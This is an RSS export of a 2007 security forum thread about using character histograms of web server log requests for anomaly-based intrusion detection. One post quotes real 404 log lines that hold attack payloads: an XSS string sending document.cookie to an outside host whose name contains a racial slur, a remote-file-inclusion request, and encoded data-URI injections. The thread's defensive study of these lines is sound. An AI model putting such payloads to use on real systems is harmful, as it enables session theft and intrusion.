<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Log file histograms</title>
        <description>This is more on the security side of things, as opposed to the attack side of things.

I was wanting to create a program that would parse through, say, Apache log files, and create a histogram of characters passed in requests. After thinking about it for 5 minutes, I thought that surely something like this already exists. 

Is anyone aware of such a script/app of this nature?

Thanks,
Jib</description>
        <link>http://sla.ckers.org/forum/read.php?12,7814,7814#msg-7814</link>
        <lastBuildDate>Tue, 21 May 2013 04:17:51 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8179#msg-8179</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8179#msg-8179</link>
            <description><![CDATA[rsnake Wrote:<br />
-------------------------------------------------------<br />
&gt; It might also be nice to look at the relative<br />
&gt; length and entropy, which might also help in<br />
&gt; detection.<br />
<br />
<br />
This is an excellent idea! Thanks for that addition. <br />
<br />
junsonn Wrote:<br />
-------------------------------------------------------<br />
&gt;To my knowledge this isn't new at all nEUrOO.<br />
&gt; I've actually done it some 3-4 years ago. I just <br />
&gt; -like i said- dumped a .txt log file every hour with<br />
&gt; a crontab and runned another crontab which <br />
&gt; called a php script over it with a few regexes <br />
&gt; to determin weird behaviour.<br />
<br />
For clarification, my intents with the script is not to output to a webpage. It will not be accessible aside from a user with a local account to the webserver. I never claimed for this to be a 'new idea' but nobody seems to know of anything out there that does what I am looking to accomplish. The concept behind this is called anomaly-based detection, as opposed to pattern-based detection. The uncommon characters being your anomalous behavior.<br />
<br />
SirNotAppearingOnThisForum Wrote:<br />
-------------------------------------------------------<br />
&gt; ok, jib, I think I got you. so for<br />
&gt; each variable on each <br />
&gt; page/file/whatever you'd want to<br />
&gt; make a seperate histogram, which<br />
&gt; would show the distribution of <br />
&gt; characters and (theoretically) make<br />
&gt; it easier to discern inconsistencies.<br />
&gt; furthermore, you want each character<br />
&gt; instance to 'remember' from which <br />
&gt; value it came from on which line. all <br />
&gt; correct?<br />
&gt;<br />
&gt; this might be sort of limited, though, <br />
&gt; as you could really only test for GET <br />
&gt; variables.<br />
<br />
You are 100% on track with my train of thought. While I want it for page specific, it may also merit having site-wide statistics as well. I believe that mod_security will permit POST variables being logged in Apache. As for IIS, I'm sure there is a way to get the data, but frankly, I'm not concerned with that at this point. I would like to just put the script into action first and see if it is any bit reliable for detection.]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 20:16:25 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8154#msg-8154</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8154#msg-8154</link>
            <description><![CDATA[ok, jib, I think I got you.  so for each variable on each page/file/whatever you'd want to make a seperate histogram, which would show the distribution of characters and (theoretically) make it easier to discern inconsistencies.  furthermore, you want each character instance to 'remember' from which value it came from on which line.  all correct?<br />
<br />
this might be sort of limited, though, as you could really only test for GET variables.]]></description>
            <dc:creator>SirNotAppearingOnThisForum</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 14:02:46 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8139#msg-8139</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8139#msg-8139</link>
            <description><![CDATA[Of course the way of gathering the information (the access log) is not new, but did you made data analysis (data-mining, prediction, etc.) and not only regexp? Because, for what I understood here, this is the point.<br />
Well, after all, maybe i'm wrong on what Jib wants to do...]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 12:18:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8136#msg-8136</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8136#msg-8136</link>
            <description><![CDATA[To my knowledge this isn't new at all nEUrOO. I've actually done it some 3-4 years ago. I just -like i said- dumped a .txt log file every hour with a crontab and runned another crontab which called a php script over it with a few regexes to determin weird behaviour.]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 12:13:48 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8134#msg-8134</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8134#msg-8134</link>
            <description><![CDATA[@RSnake:<br />
Okay, makes sense for me now, but then you need to study a type of data that you can bound or if you cannot bound you can describe it very well.<br />
I was thinking with using directly the GET then try to creates rules, extract information on it.<br />
<br />
@Jungsonn:<br />
I think the point here is not really on how to do it, but really a new IDS technique.]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 12:10:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8133#msg-8133</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8133#msg-8133</link>
            <description><![CDATA[Don't see the problem, one dumps it, the other scans it. You know quickly if it's old data if the dates are in the past, but I surely woudn't perform two jobs at crontab, chances that it will hang are much greater cause it has to dump the data and read/scan at the same time. No, not so good idea to me. It's a matter of preference i guess.]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 12:09:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8130#msg-8130</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8130#msg-8130</link>
            <description><![CDATA[You never want to have 2 crontabs for a 2 phase job. If phase 1 hangs, then phase 2 will perform it's duties on incomplete or bad data. Best solution is to write a script that performs both phases, and then use a crontab to call that script.<br />
<br />
--thrill]]></description>
            <dc:creator>thrill</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 11:46:24 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8121#msg-8121</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8121#msg-8121</link>
            <description><![CDATA[Hmm I really miss the whole point here... <br />
<br />
Why not just dump the logs with a crontab and then run a scan over it? that makes 2 crontabs; one to dump it, other to scan it. (if your planning to scan that is) And dump them in the root dir and not in the public dir or everyone can open your logs.]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 11:33:19 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8107#msg-8107</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8107#msg-8107</link>
            <description><![CDATA[Not specifically for the URL but if you are looking at the post data (or data in a particular environmental variable) you can often get some great data.  If you are expecting a number you will get really low entropy until someone puts something like an XSS attack with a relatively high entropy.  See what I'm saying?]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 10:48:20 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8102#msg-8102</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8102#msg-8102</link>
            <description><![CDATA[@RSnake:<br />
I don't see your point for the entropy. That would make sense for password analysis, but for a URL... You could have different type of URL with different entropy (from low to high) with valid content and not only a injection string I guess. And also, it depends on the URL convention of the website.<br />
Maybe I miss something, can you explain?]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 10:41:41 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8094#msg-8094</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8094#msg-8094</link>
            <description><![CDATA[It might also be nice to look at the relative length and entropy, which might also help in detection.]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Projects</category>
            <pubDate>Wed, 14 Mar 2007 10:20:18 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8067#msg-8067</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8067#msg-8067</link>
            <description><![CDATA[Ok, I guess I have been vague. I will try to thoroughly explain here.<br />
<br />
My intentions of this script/series of graphs is for intrusion detection purposes. I want a graph created for each page on a site that performs form submission. Let's just say for simplicity sake, 98% of the input received from forms on your page is valid legitimate traffic. If you have a histogram of each character that was submitted, spread over enough data entries each character should on average yield around the same occurrence frequency. Therefore, when an attack attempt is made, it will contain characters not normally seen in the requests. The result... a character appearing on your histogram that is far out of frequency scope from the rest of the characters. Example... a username field which all usernames are alpha characters. your histogram (over a large enough data sample) in theory will have characters A - Z with roughly the same frequencies. Now jungsonn comes along and cleverly tries to SQL inject my username field. Well, upon reviewing my histograms I see my typical A-Z characters with their high frequencies, but _now_ I also see a few new characters appearing (such as ', &quot;, and -) with frequencies that are drastically lower than my A-Z characters. Curiously, I click on this '-' character to show me the word in which it came from, and how often I have seen it. Results, word: &quot;--&quot; and frequency is just a handful of times. Hmm... this is unusual, I never see this type of activity, what has caused this? Click on word &quot;--&quot; and it brings me to the log lines containing sly jungsonn's attempts to thieve my site's user accounts. <br />
<br />
Now, not only do I know illegitimate activity took place, I know exactly what it was, where it came from, and do so in just a matter of seconds from looking at a bunch of lines.<br />
<br />
Does this make sense now?]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Tue, 13 Mar 2007 19:53:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8061#msg-8061</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8061#msg-8061</link>
            <description><![CDATA[How I understand the backtrack is that for each character you are able to recognize from which query it is.<br />
<br />
@Sir:<br />
Exactly. Actually I made this because I tested this on my website where there is lots of URL rewriting... so it's useless for me to parse only the GET variable.]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Tue, 13 Mar 2007 17:34:05 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8060#msg-8060</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8060#msg-8060</link>
            <description><![CDATA[how do you mean, exactly, 'backtrack from character to word to log line'?  are you saying you want the program to keep track of which character came from which word came from which line?  why not just make a histogram of words or log lines to begin with?<br />
<br />
@neuro: your script makes a histogram of the entire query, not just the GET variables (and I wasn't entirely sure about the specifics in that either; do you, jib, want it to take variable names into account as well as values, or just their values?)]]></description>
            <dc:creator>SirNotAppearingOnThisForum</dc:creator>
            <category>Projects</category>
            <pubDate>Tue, 13 Mar 2007 16:55:33 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,8026#msg-8026</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,8026#msg-8026</link>
            <description><![CDATA[But...if the script can access it, my browser can also. Isn't that a little dangerous if other users can view this as well? Or am I missing some parts of the story? <br />
<br />
Would be cool though, to write a crontab to dump logs.]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Projects</category>
            <pubDate>Tue, 13 Mar 2007 11:56:57 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7973#msg-7973</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7973#msg-7973</link>
            <description><![CDATA[I do, yes. Which is why I want to be able to backtrack from character to word, and from word to log line.]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 19:44:20 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7970#msg-7970</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7970#msg-7970</link>
            <description><![CDATA[Do you plan to make some analysis of histogram to detect intrusions?<br />
(such as pattern detection -- but you need the timestamp then)]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 18:07:20 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7968#msg-7968</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7968#msg-7968</link>
            <description><![CDATA[very cool. nEUrOO. Thanks for posting up. That is pretty close to the mental picture I had.]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 17:58:17 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7954#msg-7954</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7954#msg-7954</link>
            <description><![CDATA[Okay, i like this idea of histogram... I've made a basic script to print it:<br />
http://rgaucher.info/histo.pys<br />
<br />
Need more work but it works and shows something like this:<br />
X :<br />
_ :  |||||||||||||||||||<br />
a :  ||||||||||||||||||||||||||||||||||||||||||||||<br />
c :  ||||||||||||||||||||||<br />
b :  |||||||||||||||||||||||<br />
e :  |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||<br />
d :  ||||||||||||||||||||||||||||||||||||||<br />
g :  ||||||||||||||||||||||||||||||||||||||||||||||||||<br />
f :  ||||||||||||||<br />
i :  |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||<br />
h :  ||||||||||||||||||||||||||||||||||<br />
k :  ||||||<br />
j :  ||<br />
m :  ||||||||||||||||||||||||||||||||||||||<br />
l :  |||||||||||||||||||||||||||||||||||||||||||<br />
o :  ||||||||||||||||||||||||||||||||||||||||<br />
n :  |||||||||||||||||||||||||||||||||||||||||||<br />
q :  <br />
p :  ||||||||||||||||||||||||||||||||||||||||||||||||||||<br />
s :  ||||||||||||||||||||||||||<br />
r :  |||||||||||||||||||||||||||||||||||<br />
u :  ||||||||||||||||<br />
t :  ||||||||||||||||||||||||||||||||||||||||<br />
w :  |||||||||||||<br />
v :  ||||||||||||<br />
y :  |||||||||<br />
x :  |||||||||]]></description>
            <dc:creator>nEUrOO</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 15:43:03 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7950#msg-7950</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7950#msg-7950</link>
            <description><![CDATA[Yes, that is what I mean. I did not take mod_rewritten into account, as I am actually not looking to deploy this anywhere. I just wanted to use it in my own personal testing for theory purposes.<br />
<br />
I think I'm going to wind up just throwing something together real quick, as I want to be able to backtrack from the characters to the word they came from, and from the word to the entire log line this word was found in.<br />
<br />
Shouldn't be too difficult.]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 15:06:18 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7942#msg-7942</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7942#msg-7942</link>
            <description><![CDATA[so, you mean you want something to calculate a histogram of characters in GET variable values?  how would you distinguish between a file name and (for instance) a 'mod_rewritten' url (eg. /forum/t_2321.html might actually be a file or, more likely, 'rewritten' to come out as /forum.php?topic=2321)]]></description>
            <dc:creator>SirNotAppearingOnThisForum</dc:creator>
            <category>Projects</category>
            <pubDate>Mon, 12 Mar 2007 12:34:17 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7883#msg-7883</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7883#msg-7883</link>
            <description><![CDATA[SirNotAppearingOnThisForum Wrote:<br />
-------------------------------------------------------<br />
&gt; oh.  what did you have in mind, then?<br />
<br />
<br />
It was close, but I'm thinking histogram of each individual character, excluding filenames.]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Sun, 11 Mar 2007 15:48:54 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7878#msg-7878</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7878#msg-7878</link>
            <description><![CDATA[oh.  what did you have in mind, then?]]></description>
            <dc:creator>SirNotAppearingOnThisForum</dc:creator>
            <category>Projects</category>
            <pubDate>Sun, 11 Mar 2007 09:49:31 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7846#msg-7846</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7846#msg-7846</link>
            <description><![CDATA[SirNot...<br />
 that is a pretty neat script, however it's not exactly what I had in mind. I'm going to start working on it, and I'll post up again when I hit a milestone.<br />
<br />
Thanks though!<br />
<br />
Jib]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Sat, 10 Mar 2007 18:24:16 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7845#msg-7845</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7845#msg-7845</link>
            <description><![CDATA[WTF...]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Projects</category>
            <pubDate>Sat, 10 Mar 2007 18:21:40 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7837#msg-7837</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7837#msg-7837</link>
            <description><![CDATA[Thank you so much for that code. Now I can make a histogram of my requests that return 404s, among the funny one:<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>
1: GET /_vti_bin/owssvr.dll?UL=1&amp;ACT=4&amp;BUILD=5606&amp;STRMVER=4&amp;CAPREQ=0<br />
2: GET /%64%61%74%61%3A%69%6D%61%67%65%2F%67%69%66%3B%62%61%73%65%36%34%2CR0lGODlhUAAPAKIAAAsLav///88PD9WqsYmApmZmZtZfYmdakyH5BAQUAP8ALAAAAABQAA8AAAPbWLrc/jDKSVe4OOvNu/%209gqARDSRBHegyGMahqO4R0bQcjIQ8E4BMCQc930JluyGRmdAAcdiigMLVrApTYWy5FKM1IQe+Mp+L4rp%3Cbr%20/%3E%20hz+qIOBAUYeCY4p2tGrJZeH9y79mZsawFoaIRxF3JyiYxuHiMGb5KTkpFvZj4ZbYeCiXaOiKBwnxh4fn%3Cbr%20/%3E%20t9e3ktgZyHhrChinONs3cFAShFF2JhvCZlG5uchYNun5eedRxMAF15XEFRXgZWWdciuM8GCmdSQ84lLQ%3Cbr%20/%3EfY5R14wDB5Lyon4ubwS7jx9NcV9/j5+g4JADs<br />
2: GET /%3c%4d%45%54%41%20%48%54%54%50%2d%45%51%55%49%56%3d%5c%22%72%65%66%72%65%73%68%5c%22%20%43%4f%4e%54%45%4e%54%3d%5c%22%30%3b%75%72%6c%3d%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%57%46%4e%54%4a%79%6b%38%4c%33%4e%6a%63%6d%6c%77%64%44%34%4b%5c%22%3e.gif<br />
2: GET /ILoveHavocAce<br />
2: GET /java%20script:document.location='http://nigger.dajoob.com/x.php?x='+document.cookie<br />
2: GET /I%20am%20a%20stupid%20moron.jpg<br />
4: GET /asdasdasd<br />
8: GET /side.php?go=http://donau017.server4you.de/Imagez/msn.c?</div></blockquote>]]></description>
            <dc:creator>WhiteAcid</dc:creator>
            <category>Projects</category>
            <pubDate>Sat, 10 Mar 2007 08:15:30 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7835#msg-7835</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7835#msg-7835</link>
            <description><![CDATA[here's a sort of hacked together, slightly ad-hoc and presumptuous one if you're interested: http://sirnot.110mb.com/histogram.c (it assumes that the query string is encapsulated in quotes somewhere in the line, and it only bothers with GET and POST ones)]]></description>
            <dc:creator>SirNotAppearingOnThisForum</dc:creator>
            <category>Projects</category>
            <pubDate>Sat, 10 Mar 2007 07:12:52 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7817#msg-7817</guid>
            <title>Re: Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7817#msg-7817</link>
            <description><![CDATA[I'm not aware of that particular take on log parsing, but I have heard of a number of log parsing projects popping up.  I think a number of them are pipe dreams, so there is certainly room for another one if you think you have a better take on it.]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Projects</category>
            <pubDate>Fri, 09 Mar 2007 16:13:05 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?12,7814,7814#msg-7814</guid>
            <title>Log file histograms</title>
            <link>http://sla.ckers.org/forum/read.php?12,7814,7814#msg-7814</link>
            <description><![CDATA[This is more on the security side of things, as opposed to the attack side of things.<br />
<br />
I was wanting to create a program that would parse through, say, Apache log files, and create a histogram of characters passed in requests. After thinking about it for 5 minutes, I thought that surely something like this already exists. <br />
<br />
Is anyone aware of such a script/app of this nature?<br />
<br />
Thanks,<br />
Jib]]></description>
            <dc:creator>Jib</dc:creator>
            <category>Projects</category>
            <pubDate>Fri, 09 Mar 2007 15:35:26 -0600</pubDate>
        </item>
    </channel>
</rss>
